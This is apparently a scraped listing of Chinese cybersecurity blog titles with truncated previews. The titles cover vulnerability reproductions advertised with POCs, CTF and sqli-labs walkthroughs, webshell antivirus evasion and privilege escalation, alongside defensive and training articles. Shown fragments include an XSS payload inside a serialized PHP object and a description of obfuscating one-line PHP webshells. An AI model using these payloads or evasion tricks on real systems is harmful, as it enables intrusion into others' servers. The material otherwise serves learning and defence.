漏洞描述 Weaver E-Office是中国泛微科技（Weaver）公司的一个协同办公系统。 Weaver E-Office 9.5版本存在安全漏洞。攻击者利用该漏洞可以访问文件或目录。影响版本 Weaver E-Office 9.5版本免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵…

中间件安全：Apache Tomcat 文件上传.（CVE-2017-12615）

中间件安全：Apache Tomcat 文件上传. 当存在漏洞的 Tomcat 运行在 Windows / Linux 主机上，且启用了 HTTP PUT 请求方法(例如，将 readonly 初始化参数由默认值设置为ialse) ， 攻击者将有可能可通过精心构造的攻击请求数据包向服务…

渗透实例------2个星期艰难的渗透纪实

2个星期艰难的渗透纪实 kyo327 入侵原因，需删一帖子，目标用www.111.com代替，前期通过初期的网站文件暴力猜解，扫描到robots.txt这个文件，有以下目录。如图1：图1 再通过对这些文件的访问，从3gadm.php文件的标题栏得到该网站采用的是diy-page8.3的cms，自然可以先用搜索…

15位、7位可控字符下的任意命令执行

可控字符串长度受限情况下 Getshell

使用云 SIEM 解决方案保护IT 基础设施

什么是云 SIEM 基于云的 SIEM 解决方案将 SIEM 功能作为服务提供，云 SIEM 解决方案可保护您的网络;提供威胁情报，提供用于检测、优先处理和解决安全事件的控制台，并帮助您遵守法规要求。云 SIEM 解决方案在管理本地和云环境的网络安全时提供…

网络安全（黑客）—自学手册

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

pikachu_php反序列化

pikachu_php反序列化源代码 class S{var $test "pikachu";function __construct(){echo $this->test;} }//O:1:"S":1:{s:4:"test";s:29:"<script>alert(xss)</script>";} $html; if(isset($_POST[o])){$s $_POST[…

脸爱云一脸通智慧管理平台未授权访问

声明本文仅用于技术交流，请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。一、漏洞概述脸爱云一脸通智慧管理平台存在严重漏洞，允许…

亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口存在任意文件上传漏洞附POC

@[toc] 免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 1. 亿赛通电子文档安全管理系统接口简介微信…

深信服防火墙路由模式开局部署-手把手教学（小白篇）

PS：深信服的设备只有400能够通过console连接，一般用户是无法连接的，所以大家不要妄想着从Console连接设备了，开局就通过MANAGE进入Web就可以接通电源后，开机拿一根网线，一端连接防火墙的MANAGE口&#xf…

网络通信安全的坚固防线双向认证技术详解

目录什么是双向认证双向认证的工作原理双向认证的实现方式双向认证的重要性双向认证的挑战安全最佳实践小结什么是双向认证双向认证，又称为双向身份验证或双向鉴别，是一种在通信双方之间建立信任关系的安全机制。在通信过程中&#xff0…

什么是木马

木马 1. 定义2. 木马的特征3. 木马攻击流程4. 常见木马类型5. 如何防御木马 1. 定义木马一名来源于古希腊特洛伊战争中著名的“木马计”，指可以非法控制计算机，或在他人计算机中从事秘密活动的恶意软件。木马通过伪装成正常软件被下载到用户主机&…

大数据技术之数据安全与网络安全——CMS靶场实训

大数据技术之数据安全与网络安全——CMS靶场实训在当今数字化时代，大数据技术的迅猛发展带来了前所未有的数据增长，同时也催生了对数据安全和网络安全的更为迫切的需求。本篇博客将聚焦于大数据技术背景下的数据安全与网络安全，并通过CMS&a…

BUUCTF [MRCTF2020]Ez_bypass 1

题目环境：F12查看源代码 I put something in F12 for you include flag.php; $flagMRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}; if(isset($_GET[gg])&&isset($_GET[id])) { $id$_GET[id]; $gg$_GET[gg]; if (md5($id) md5($gg) && $id ! $gg) { …

【隐写分析】常用工具

隐写分析开源隐写分析工具：ManTra-Net，StegExpose 检测工具：检测隐写术【之前记录的网址，失效了】 1 StegExpose 2014（可用） 源代码：https://github.com/b3dk7/StegExpose StegExpose 是一…

2023最新 chromium 内核存在任意文件读取0day 漏洞！(附exp)

文章目录 0x01 漏洞详情一、官方的公告0x02 EXP利用0x03 利用场景0x04 漏洞危害0x05 防范总结0x01 漏洞详情受害者只要点击了攻击者进行构造的链接，即可被读取任意文件。简短描述：Libxslt 是基于 WebKit 的浏览器（例如 chrome、safari 等）中使用的默认 XSL 库。Libxslt…

Couchdb 权限绕过漏洞复现（CVE-2017-12635）

Couchdb 权限绕过漏洞复现（CVE-2017-12635） 开启环境给了三个端口号，不知道哪个是正常的，最后试出来52226端口正常。登录URL：http://192.168.91.129/_utils/# 来到了登录页面用postman发送PUT方法的…

Web 安全之 X-XSS-Protection 详解

目录什么是 X-XSS-Protection XSS 攻击概述 X-XSS-Protection 的值工作原理如何设置 X-XSS-Protection 头示例说明 X-XSS-Protection 局限性现代替代方案小结什么是 X-XSS-Protection X-XSS-Protection 是一个旨在启用或配置某些版本的 Internet Explorer、C…

P8A005-A008系统加固

系统账户数据库安全预备知识】数据库研究跨越于计算机应用、系统软件和理论三个领域，其中应用促进新系统的研制开发，新系统带来新的理论研究，而理论研究又对前两个领域起着指导作用。【实验步骤】网络拓扑：server2008-bas…

sqli-labs靶场详解(less17-less22)

目录 less-17 less-18 less-19 less-20 less-21 less-22 less-17 修改密码关卡服务器后端账号密码都存在数据库中使用UPDATE进行修改密码尝试username处尝试好久尝试不出来应该是对用户名进行了过滤于是对password进行注入判断注入点 passwdadmin 报错&#xff1a…

P8A002-CIA安全模型-配置Linux描述网络安全CIA模型之可用性案例

【预备知识】可用性（Availability） 数据可用性是一种以使用者为中心的设计概念，易用性设计的重点在于让产品的设计能够符合使用者的习惯与需求。以互联网网站的设计为例，希望让使用者在浏览的过程中不会产生压力或感到挫折&#…

【开源威胁情报挖掘1】引言 + 开源威胁情报挖掘框架 + 开源威胁情报采集与识别提取

基于开源信息平台的威胁情报挖掘综述写在最前面摘要1 引言近年来的一些新型网络安全威胁类型挖掘网络威胁的情报信息威胁情报分类：内、外部威胁情报国内外开源威胁情报挖掘分析工作主要贡献研究范围和方法 2 开源威胁情报挖掘框架1. 开源威胁情报采集与识别2. 开源…

SQL注入-数据库基础/SQL语法

目录一，数据库概述 1.1 数据库 1.2 了解 ACID 理论 1.3 识别数据库二，SQL 语法基础三，SQL语句实例 3.1 SQL基础语句 3.2 SQL高级语句四，基于SQL注入理解语法/函数 4.1 语法 4.2 函数五，目录数据库info…

HeteroTiC: 基于异构时间通道的鲁棒网络流水印

文章信息论文题目：HeteroTiC: A robust network flow watermarking based on heterogeneous time channels 期刊（会议）：Computer Networks 时间：2022 级别：CCF B 文章链接：https://doi.org/10…

DDoS高防IP到底是什么？

DDoS高防IP是提供一个带防御的IP，主要是针对网络中的DDoS攻击进行保护，是针对互联网服务器遭受大流量的DDoS攻击后，导致服务不可用的情况下，用户可以通过配置高防IP，将攻击流量引流到高防IP上，从而确保源站…

Spring boot命令执行 (CVE-2022-22947)漏洞复现和相关利用工具

Spring boot命令执行 (CVE-2022-22947)漏洞复现和相关利用工具名称: spring 命令执行 (CVE-2022-22947) 描述: Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本（包含）以前存在一处SpEL表达式注入漏洞，当攻击者可以访问A…

漏洞复现--安恒明御安全网关 aaa_local_web_preview 任意文件上传

免责声明： 文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…

sqli-labs靶场详解（less32-less37）

宽字节注入原理在下方目录 less-32 less-33 less-34 less-35 less-36 less-37 less-32 正常页面 ?id1 下面有提示获取到了Hint: The Query String you input is escaped as : 1\ ?id1 看来是把参数中的非法字符就加上了转义从而在数据库中只能把单引号当成普通的字…

lxd提权

lxd/lxc提权漏洞介绍 lxd是一个root进程，它可以负责执行任意用户的lxd，unix套接字写入访问操作。而且在一些情况下，lxd不会调用它的用户权限进行检查和匹配原理可以理解为用用户创建一个容器，再用容器挂载宿主机磁盘&#xf…

网络安全应该怎么学？（0基础小白）

一、网络安全应该怎么学？ 1.计算机基础需要过关这一步跟网安关系暂时不大，是进入it行业每个人都必须掌握的基础能力。计算机网络计算机操作系统算法与数据架构数据库 Tips:不用非要钻研至非常精通，可以与学习其他课程同步进行。 2.渗透技…

【漏洞复现】万户协同办公平台ezoffice SendFileCheckTemplateEdit.jsp接口存在SQL注入漏洞附POC

漏洞描述万户ezOFFICE协同管理平台是一个综合信息基础应用平台。万户协同办公平台ezoffice SendFileCheckTemplateEdit.jsp接口存在SQL注入漏洞。免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害…

什么是光模块光模块看我这张就够啦！

1、什么是光模块信号在光网络中传输时，必须进行光/电转换。光模块就是专门在光网络中完成光/电转换工作的部件。光模块的外观结构如图1所示，简单的来说，双绞线最大传输距离是100米，用的是电信号，那如果说传输距离超过…

arXiv学术速递笔记11.29

文章目录一、自动驾驶/目标检测Improving Lane Detection Generalization: A Novel Framework using HD Maps for Boosting DiversityTowards Full-scene Domain Generalization in Multi-agent Collaborative Birds Eye View Segmentation for Connected and Autonomous Driv…

西工大网络空间安全学院计算机系统基础实验一（61分答案）

只能说没有一道题是自己写的，都是在网上查资料抄别人的，也不知道这有什么意思。也不知道自己学到了什么，怎么说呢，Emmmm......对了，文末最后的几段话是为了凑字数，大家简单忽略掉就好。 /* * tmin - retur…

电脑如何禁止截屏

禁止电脑截屏是一项重要的安全措施，可以保护用户隐私和防止恶意软件的使用。以下是几种禁止电脑截屏的方法： 形式一： 一刀切，全部禁止截屏可以在域之盾软件后，点击桌面管理，然后选择禁止截屏。就能禁止所…

【华为数通HCIP | 网络工程师】821-IGP高频题、易错题之OSPF（6）

个人名片： 🐼作者简介：一名大三在校生，喜欢AI编程🎋 🐻‍❄️个人主页🥇：落798. 🐼个人WeChat：hmmwx53 🕊️系列专栏：🖼️…

用友NC word.docx接口存在任意文件读取漏洞附POC

@[toc] 用友NC word.docx接口存在任意文件读取漏洞附POC 免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使…

php一句话木马免杀

php一句话木马免杀针对于php一句话木马做免杀： 利用php动态函数的特性，将危险函数拆分成字符，最终使用字符串拼接的方式，然后重新拼接，后加括号执行代码，并且可以使用花指令进行包装，如无限i…

web:very_easy_sql（sql、ssrf、gopher协议sql注入）

题目页面显示如下显示不是内部用户，无法识别信息查看源码，找到一个use.php 访问之后显示如下随便输入了一个，发现url有参数显示试一下靶机的网址，返回nonono 联系之前原始页面写的“不是内网用户，无法别识身份”…

Secure Software Lifecycle Management (SSLM)安全软件生命周期管理

文章目录前言一、现代理念二、安全的软件生命周期管理总结前言 The concept of integrating security into the software development process is not new. While I cannot definitively assert that Microsoft was the pioneer of this concept, the Secure Development Li…

Python简单模拟蓝牙车钥匙协议

本文设计一个简单的蓝牙车钥匙协议，协议包含DH密钥协商和基于RSA的身份认证功能，以及防重放与消息完整性验证。 1. 密钥协商过程: - 设定 DH 参数：素数 p 和生成元 g。 - 发送方（Alice）生成 DH 的私钥 a 并计算公钥 A…

【论文解读：EXPLANING AND HARNESSING ADVERSARIAL EXAMPLES】

论文解读：EXPLANING AND HARNESSING ADVERSARIAL EXAMPLES 摘要引言相关工作对抗样本的线性解释非线性模型的线性扰动线性模型的对抗训练VS权重衰减深度网络的对抗训练不同模型的能力为什么对抗样本具有泛化性？可能的假设总结和讨论摘要许多机器学习模…

为什么建议SCI论文投稿时使用edu邮箱？

SCI论文投稿时，很多期刊并没有明确规定说不允许使用非edu邮箱，许多SCI期刊也经常遇到作者邮箱为多种后缀的情况，比如Google、hotmail和163等等。但是，很多时候期刊编辑会建议作者使用“academic email address”，也就…

什么是TDR（威胁检测与响应）

网络安全是被动和主动方法的混合体。过去，企业往往局限于被动的方法，随着合规性和安全策略越来越受到重视，主动方法也越来越受到关注。与其他行业相比，网络安全是高度动态的，网络安全团队采用任何可以帮助他们优化的新…

web：[SUCTF 2019]CheckIn（一句话木马，.user.ini）

题目页面显示上传文件，随便上传一个文件试试上传了一个文本，显示失败，不是图片那就换图片马上传试试不能包含<?,换一种写法，需要加上GIF89a，进行exif_imagetype绕过上传成功这里用.user.ini或者用post传参…

安全众测-内网渗透常用的工具和命令

最近参加企业内部的众测，我是一名新手，所以先学习使用工具扫描的方法。如下是我的一些经验。记住：渗透测试的本质是信息收集，信息越多，出现漏洞的可能性就越大，一直到收集到所有资产为止。网站的robots.…

$汽车网络安全--ISO\SAE 21434解析(二)$

汽车网络安全--ISO\SAE 21434解析(二)

1.风险评估方法书接上文，我们正式开始对车灯系统的TARA分析，首先回顾下整车关于车灯系统描述：可以比较肯定的是，我们定义的item为车灯系统，因此可以看到上图中画出了item boundary；同时定义出运行环境，个人理解，这块就是为TARA分析提供足够的环境支撑，不管是直接还…

使用 MITRE ATTCK® 框架缓解网络安全威胁

什么是MITRE ATT&CK框架 MITRE Adversarial Tactics， Techniques， and Common Knowledge（ATT&CK）是一个威胁建模框架，用于对攻击者用来入侵企业、云和工业控制系统（ICS）并发起网络攻击…

2023年山东省职业院校技能大赛信息安全管理与评估第一阶段样题

2023年山东省职业院校技能大赛信息安全管理与评估样题竞赛需要完成三个阶段的任务，分别完成三个模块，总分共计 1000 分。三个模块内容和分值分别是： \1. 第一阶段：模块一网络平台搭建与设备安全防护（240 分钟&…

2024年江苏省职业院校技能大赛信息安全管理与评估第三阶段教师组（样卷）

2024年江苏省职业院校技能大赛信息安全管理与评估第三阶段教师组（样卷） 竞赛项目赛题本文件为信息安全管理与评估项目竞赛-第三阶段教师组样题， 内容包括：网络安全渗透、理论技能与职业素养。本次比赛时间为180分钟。介绍 Ge…

2024年江苏省职业院校技能大赛信息安全管理与评估第三阶段学生组（样卷）

2024年江苏省职业院校技能大赛信息安全管理与评估第三阶段学生组（样卷） 竞赛项目赛题本文件为信息安全管理与评估项目竞赛-第三阶段样题，内容包括：网络安全渗透、理论技能与职业素养。本次比赛时间为180分钟。介绍 GeekSe…

【南京站-EI会议征稿中】第三届网络安全、人工智能与数字经济国际学术会议（CSAIDE 2024）

第三届网络安全、人工智能与数字经济国际学术会议（CSAIDE 2024） 2024 3rd International Conference on Cyber Security, Artificial Intelligence and Digital Economy 第三届网络安全、人工智能与数字经济国际学术会议（CSAIDE 2024&…

2024 年甘肃省职业院校技能大赛信息安全管理与评估赛项规程

2024 年甘肃省职业院校技能大赛高职学生组电子与信息大类信息安全管理与评估赛项规程一、赛项名称赛项名称：信息安全管理与评估赛项类别：团体赛赛项归属：电子与信息大类二、竞赛目的极安云科专注技能竞赛，包含网络建设…

2024年甘肃省职业院校技能大赛信息安全管理与评估赛项一阶段样题一

2024年甘肃省职业院校技能大赛高职学生组电子与信息大类信息安全管理与评估赛项样题一竞赛需要完成三个阶段的任务，分别完成三个模块，总分共计 1000分。三个模块内容和分值分别是： 1.第一阶段：模块一网络平台搭建与设备安全防…

2024黑龙江省职业院校技能大赛信息安全管理与评估赛项规程

2024黑龙江省职业院校技能大赛暨国赛选拔赛 “GZ032信息安全管理与评估”赛项规程极安云科专注技能竞赛，包含网络建设与运维和信息安全管理与评估两大赛项，及各大CTF，基于两大赛项提供全面的系统性培训，拥有完整的培训体系。团队…

【产品安全平台】上海道宁与Cybellum将整个产品安全工作流程整合到一个专用平台中，保持构建的互联产品的网络安全和网络合规性

Cybellum将整个产品安全工作流程整合到一个专用平台中使设备制造商能够保持他们构建的互联产品的网络安全和网络合规性产品安全性对每个人来说都不一样每个行业的系统、工作流程和法规都存在根本差异因此，Cybellum量身定制了 Cybellum的平台和技…

HTB Devvortex

Devvortex 2023.11.27 10.26user nmap ┌──(kali㉿kali)-[~/HTB/machine/Devvortex] └─$ nmap -A 10.10.11.242 Starting Nmap 7.94

JWT介绍及演示

JWT 介绍 cookie(放在浏览器) cookie 是一个非常具体的东西，指的就是浏览器里面能永久存储的一种数据，仅仅是浏览器实现的一种数据存储功能。 cookie由服务器生成，发送给浏览器，浏览器把cookie以kv形式保存到某个目录下的文本…

Nessus 工具学习

Nessus 工具学习 1.1 工具的下载路径1.2 工具的安装流程1.3 工具的详细使1.3.1 配置参数1.3.2 测试实验 Nessus具有强大的漏洞扫描引擎，可以对目标网络进行全面的扫描，以识别各种类型的漏洞和安全问题。它支持多种扫描模式，包括主动扫描、被动…

网络安全（黑客技术）—学习

前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防…

御剑工具学习

御剑 1.1 工具的下载路径1.2 工具的安装流程1.3 工具的详细使用 1.1 工具的下载路径百度网盘链接：https://pan.baidu.com/s/1Bn7GtWb7AStcjzVahFOjSQ 提取码：zkaq 1.2 工具的安装流程御剑不用安装，直接下载下来解压，双击“御…

CTF网络安全大赛是干什么的？发展史、赛制、赛程介绍，参赛需要学什么？

CTF（Capture The Flag）是一种网络安全竞赛，它模拟了各种信息安全场景，旨在提升参与者的网络安全技能。CTF 赛事通常包含多种类型的挑战，如密码学、逆向工程、网络攻防、Web 安全、二进制利用等。发展史 CTF 的概念…

金蝶 Apusic 应用服务器任意文件上传漏洞

声明本文仅用于技术交流，请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。 1. 产品介绍金蝶 Apusic 是金蝶集团旗下的一款企业级应用服务器&#…

SD-WAN VS MPLS ：怎么选择最合适的网络连接方案？

随着企业网络需求的不断增长，网络连接方案也变得更加多样化。在这种情况下，SD-WAN和MPLS成为了企业考虑的两种主要选择。本文将就SD-WAN和MPLS这两种网络连接方案进行比较，深入探讨它们在成本、体验、部署周期和运维等方面的差异。 1、成本投…

赛宁网安多领域亮相第三届网络空间内生安全发展大会

2023年12月8日，第三届网络空间内生安全发展大会在宁开幕。两院院士、杰出专家学者和知名企业家相聚南京，围绕数字经济新生态、网络安全新范式进行广泛研讨，为筑牢数字安全底座贡献智慧和力量。大会围绕“一会、一赛、一展”举办了丰富多彩的…

【漏洞复现】云时空社会化商业ERP系统gpy文件上传

漏洞描述用友软件的先进管理理念，汇集各医药企业特色管理需求，通过规范各个流通环节从而提高企业竞争力、降低人员成本，最终实现全面服务于医药批发、零售连锁企业的信息化建设的目标，是一款全面贴合最新GSP要求的医药流通行业一站式管理系统。时空云社会化商业ERP gpy…

黑客（网络安全）技术自学30天

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

eNSP综合实验合集（eNSP综合大作业合集）_可先收藏

作者：BSXY_19计科_陈永跃 BSXY_信息学院注：未经允许禁止转发任何内容 **注：在该文章中就只对ensp综合实验做一个总结和归纳，只给出相应的topo图和需求说明和对应的文章的连接。有什么问题也可以私信我，看到都会回复的…

企业网络新阶段：SD-WAN在云时代的关键作用

随着云时代的到来，企业正纷纷将IT系统迁移到公有云上，以迎合快速变化的业务需求。在这一浪潮中，企业SD-WAN（软件定义广域网）的角色变得至关重要。本文将深入探讨SD-WAN在云时代的关键作用，以及为企业网络带…

服务器被攻击宕机的一些小建议

现在网络攻击屡有发生，任何网站服务器都面临这样的危险，服务器被攻击造成的崩溃宕机是损失是我们无法估量的。网络攻击我们无法预测，但做好防御措施是必须的，建议所有的网站都要做好防范措施，准备相应的防护预案&#…

用友NC word.docx任意文件读取漏洞

文章目录产品简介漏洞概述指纹识别漏洞利用修复建议产品简介用友NC是一款企业级ERP软件。作为一种信息化管理工具，用友NC提供了一系列业务管理模块，包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等，帮助企业实现数…

【网络安全技术】电子邮件安全PGP，SMIME

一、PGP（Pretty Good Privacy） PGP是一种邮件加密手段，他在发邮件一方加密，然后发给发送方邮件服务器，发送方邮件服务器再发送给接收方邮件服务器，然后接收方再从接收方邮件服务器pop出来，这整…

网络安全—学习溯源和日志分析

日志分析的步骤： 判断是否为攻击行为不是：不用处理是：判断攻击是否成功或者失败攻击失败：判断IP地址是否为恶意地址，可以让防火墙过滤IP地址攻击成功：做应急处置和溯源分析应急处置：网络下…

西工大计院计算机系统基础实验二（配置gdb插件）

第二次实验是二进制炸弹实验，为了简化操作，并且让大家接下来能够按照作者之前已经为网安院写好的博客西工大网络空间安全学院计算机系统基础实验二（清楚实验框架及phase_1）-CSDN博客来走，大家需要下载一款好用的gdb插件…

从零开始配置kali2023环境：镜像保存和导入

对原始的镜像做了一些改动，然后把当前容器状态打包为新的镜像，这样以后可以部署到其他地方了，而不用再安装软件等改动等等 1.查看容器id ┌──(holyeyes㉿kali2023)-[~] └─$ sudo docker ps ┌──(holyeyes㉿kali2023)-[~] └─$ s…

BugKu-Web-Flask_FileUpload(模板注入与文件上传）

Flask Flask是一个使用Python编写的轻量级Web应用框架。它是一个微型框架，因为它的核心非常简单，但可以通过扩展来增加其他功能。Flask的核心组件包括Werkzeug，一个WSGI工具箱，以及Jinja2，一个模板引擎。 Flask使用BSD…

windows应急响应基础（基础和常用命令）

windows应急响应 windows应急响应常用的命令和基础工具介绍，帮助安全服务工程师快速入门或者是对网络安全感信息的同学学习。仅做抛砖引玉。系统信息其中包括正在运行的服务，加载模块，服务和系统驱动等等。命令： msinfo32用…

【网络安全】网络防护之旅 - Java安全机制探秘与数字证书引爆网络防线

🌈个人主页：Sarapines Programmer🔥 系列专栏：《网络安全之道 | 数字征程》⏰墨香寄清辞：千里传信如电光，密码奥妙似仙方。挑战黑暗剑拔弩张，网络战场誓守长。目录 😈1. 初识网络安…

【网络安全】-Linux操作系统基础

文章目录 Linux操作系统目录结构Linux命令格式Linux文件和目录操作命令Linux用户和用户组操作命令Linux查看和操作文件内容命令Linux文件压缩和解压缩命令Linux网络管理命令Linux磁盘管理和系统状态命令Linux安全加固总结 Linux是一个强大的操作系统，广泛用于服务器…

漏洞复现--SysAid On-premise远程代码执行(CVE-2023-47246)

免责声明： 文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…

全同态加密正在改变行业游戏规则？

PrimiHub一款由密码学专家团队打造的开源隐私计算平台，专注于分享数据安全、密码学、联邦学习、同态加密等隐私计算领域的技术和内容。隐私专业人士正在见证隐私技术的一场革命。新的隐私增强技术的出现和成熟是这场革命的一部分，这些技术允许数据使用和…

浅析PAM市场价值

随着全球数字化蓬勃发展，云计算、人工智能、大数据、5G等技术的应用范围不断扩大，在企业运用新技术提高自身效率的同时也面临着更多由新技术诱发的网络威胁，全球网络威胁形势愈发严峻。网络攻击行为日趋复杂，构建全面的安全防护体…

青少年CTF-qsnctf-Web-include01include02（多种方法-知识点较多-建议收藏！）

PHP常见伪协议 php://filter是PHP中独有的一种协议，它是一种过滤器，可以作为一个中间流来过滤其他的数据流。通常使用该协议来读取或者写入部分数据，且在读取和写入之前对数据进行一些过滤，例如base64编码处理，rot13处…

红队打靶练习:WINTERMUTE: 1

前言网络扫描（Nmap、netdiscover） HTTP 服务枚举使用电子邮件日志文件在浏览器中进行目录遍历利用 SMTP RCPT 选项中的操作系统命令注入生成 PHP 后门 (Msfvenom) 执行RCPT选项中嵌入的后门反向连接（Metasploit） 导入 pytho…

数据安全扫描仪荣膺网络安全优秀创新成果大赛优胜奖 - 凸显多重优势

近日，由中国网络安全产业联盟（CCIA）主办、CCI数据安全工作委员会中国电子技术标准化研究院等单位承办的“2023年网络安全优秀创新成果大赛”获奖名单公布。天空卫士数据安全扫描仪（DSS）产品获得创新成果大赛优胜奖。本…

【2023最新版】Wireshark安装保姆级教程（超详细），及简单使用Wireshark抓包

一、官网下载地址： [wireshark](https://www.wireshark.org/) 二、步骤： 根据自己情况选择安装版本，我这里安装Windows版本双击下载完成的应用这里可以选择自己安装路径，也可以默认下面点击Install后，安装过程中会跳…

【计算机四级（网络工程师）笔记】操作系统概论

目录一、OS的概念 1.1OS的定义 1.2OS的特征 1.2.1并发性 1.2.2共享性 1.2.3随机性 1.3研究OS的观点 1.3.1软件的观点 1.3.2资源管理器的观点 1.3.3进程的观点 1.3.4虚拟机的观点 1.3.5服务提供者的观点二、OS的分类 2.1批处理操作系统 2.2分时操作系统 2.3实时操作系统 2.4嵌…

梦想家内容管理系统（Dreamer CMS）跨站请求伪造漏洞

梦想家内容管理系统（Dreamer CMS）跨站请求伪造漏洞目标:GitHub - iteachyou-wjn/dreamer_cms: Dreamer CMS 梦想家内容发布系统采用流行的SpringBoot搭建，支持静态化、标签化建站。不需要专业的后台开发技能，会HTML就能建站&…

由浅入深，一文掌握NGINX知识文集

🏆作者简介，普修罗双战士，一直追求不断学习和成长，在技术的道路上持续探索和实践。 🏆多年互联网行业从业经验，历任核心研发工程师，项目技术负责人。 🎉欢迎 👍点赞✍评论…

等级保护的物理安全技术措施

目录信息安全等级保护物理安全技术的控制点物理位置的选择物理访问控制防盗窃和防破坏防雷击防火防火和防潮防静电温湿度控制电力供应电磁防护信息安全等级保护物理安全技术的控制点物理位置的选择物理访问控制防盗窃和防破坏防雷击防火防火和防…

sqlilabs第三十四三十五关

Less-34（POST - Bypass AddSlashes()) 手工注入和sqlilabs第三十二三十三关-CSDN博客一样只是变成post 但是注意一下get方式是会经过url编码的，但是post是不会编码的，我们可以使用utf-8转换成utf-16或者utf-32(利用%bb) （写掉…

黑客又出击了！泄露索尼SIE内部数据

黑客泄露数据显示索尼 SIE 未来有望加强第一方“中型游戏”开发，填补大成本 3A 制作周期空洞 12 月 25 日消息称，黑客团队 Rhysida 近日泄露了大量来自索尼游戏工作室“失眠组”（Insomniac Games）的内部数据，其中显示…

Vulnhub-Al-Web-1.0 靶机复现完整过程

一、信息收集 1.主机发现 arp-scan -l2.端口扫描 nmap -sV -p- 192.168.200.16PORTSTATESERVICEVERSIONMAC Address80/TCPOpenhttpApache httpd00:0C:29:C4:1B:78 (VMware) 3.目录扫描 python dirsearch.py -u http://192.168.200.16扫描出来这两个文件，首先先…

Kali Linux中的十大WiFi攻击工具介绍

在这十大WiFi攻击黑客工具中，我们将讨论一个非常受欢迎的主题：无线网络攻击以及如何防止黑客入侵。无线网络通常是网络的一个弱点，因为WiFi信号可以随处可见，任何人都可以使用。还有很多路由器包含漏洞，可以利用正确的…

交换机端口镜像技术原理与配置

在网络维护的过程中会遇到需要对报文进行获取和分析的情况，比如怀疑有攻击报文，此时需要在不影响报文转发的情况下，对报文进行获取和分析。镜像技术可以在不影响报文正常处理流程的情况下，将镜像端口的报文复制一份到观察端口&…

Potato提权(原理简述)

文章目录 WebShell提权简述Potato提权(原理简述)PrintSpoofer （BadPotato/PipePotato ）原理分析PrintSpoofer （BadPotato/PipePotato ）提权姿势PrintSpoofer（BadPotato/PipePotato ） 总结 WebShell提权简述…

7.7、kali linux环境下搭建DVWA

目录一、资料下载准备工作 1.1、DVWA源代码下载二、开启Apache、mysql服务 2.1、下载Apache2文件 2.2、开启Apache2服务方法一：开启Apache2服务（手动） 方法二：开启Apache2服务（系统自启动） 2.3、…

SQL注入【ByPass有点难的靶场实战】(九)

★★免责声明★★ 文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与学习之用，读者将信息做其他用途，由Ta承担全部法律及连带责任，文章作者不承担任何法律及连带责任。 0、总体思路先确认是否可以SQL注入，使用单…

OpenWrt 编译入门（小白版）

编译环境示例编译所用系统为 Ubuntu 22.04，信息如下编译时由于网络问题，部分软件包可能出现下载问题，还请自备网络工具或尝试重新运行命令编译步骤下图为官网指示编译环境设置（Build system setup） 这里根据我…

详解信道容量，信道速率，安全速率的区别

目录一. 信道容量与信道速率二. 小结三. 安全速率与物理层安全 3.1 香农物理层安全模型 3.2 安全信道速率四. 补充安全中断概率（Secrecy Outage Probability, SOP） 五. 补充安全分集度（Secrecy Diversity Order, SDO） …

脆弱的SSL加密算法漏洞原理以及修复方法

漏洞名称：弱加密算法、脆弱的加密算法、脆弱的SSL加密算法、openssl的FREAK Attack漏洞漏洞描述：脆弱的SSL加密算法，是一种常见的漏洞，且至今仍有大量软件支持低强度的加密协议，包括部分版本的openssl。其实&#xf…

天融信TOPSEC安全管理系统存在远程命令执行漏洞

文章目录产品简介漏洞概述指纹识别漏洞利用修复建议产品简介天融信TopSec 安全管理系统，是基于大数据架构，采用多种技术手段收集各类探针设备安全数据，围绕资产、漏洞、攻击、威胁等安全要素进行全面分析，提供统一监测告警、集…

[Vulnhub靶机] DriftingBlues: 2

[Vulnhub靶机] DriftingBlues: 2靶机渗透思路及方法（个人分享） 靶机下载地址： https://download.vulnhub.com/driftingblues/driftingblues2.ova 靶机地址：192.168.67.21 攻击机地址：192.168.67.3 一、信息收集 1.…

2023年“中银杯”安徽省网络安全B模块（部分解析）

前言以下是2023年中银杯安徽省网络安全B模块题目，镜像可以私聊我 B模块安全事件响应/网络安全数据取证/应用安全（400 分） B-1：CMS网站渗透测试任务环境说明： √服务器场景：Server2206（关…

网络安全B模块（笔记详解）- 弱口令渗透测试

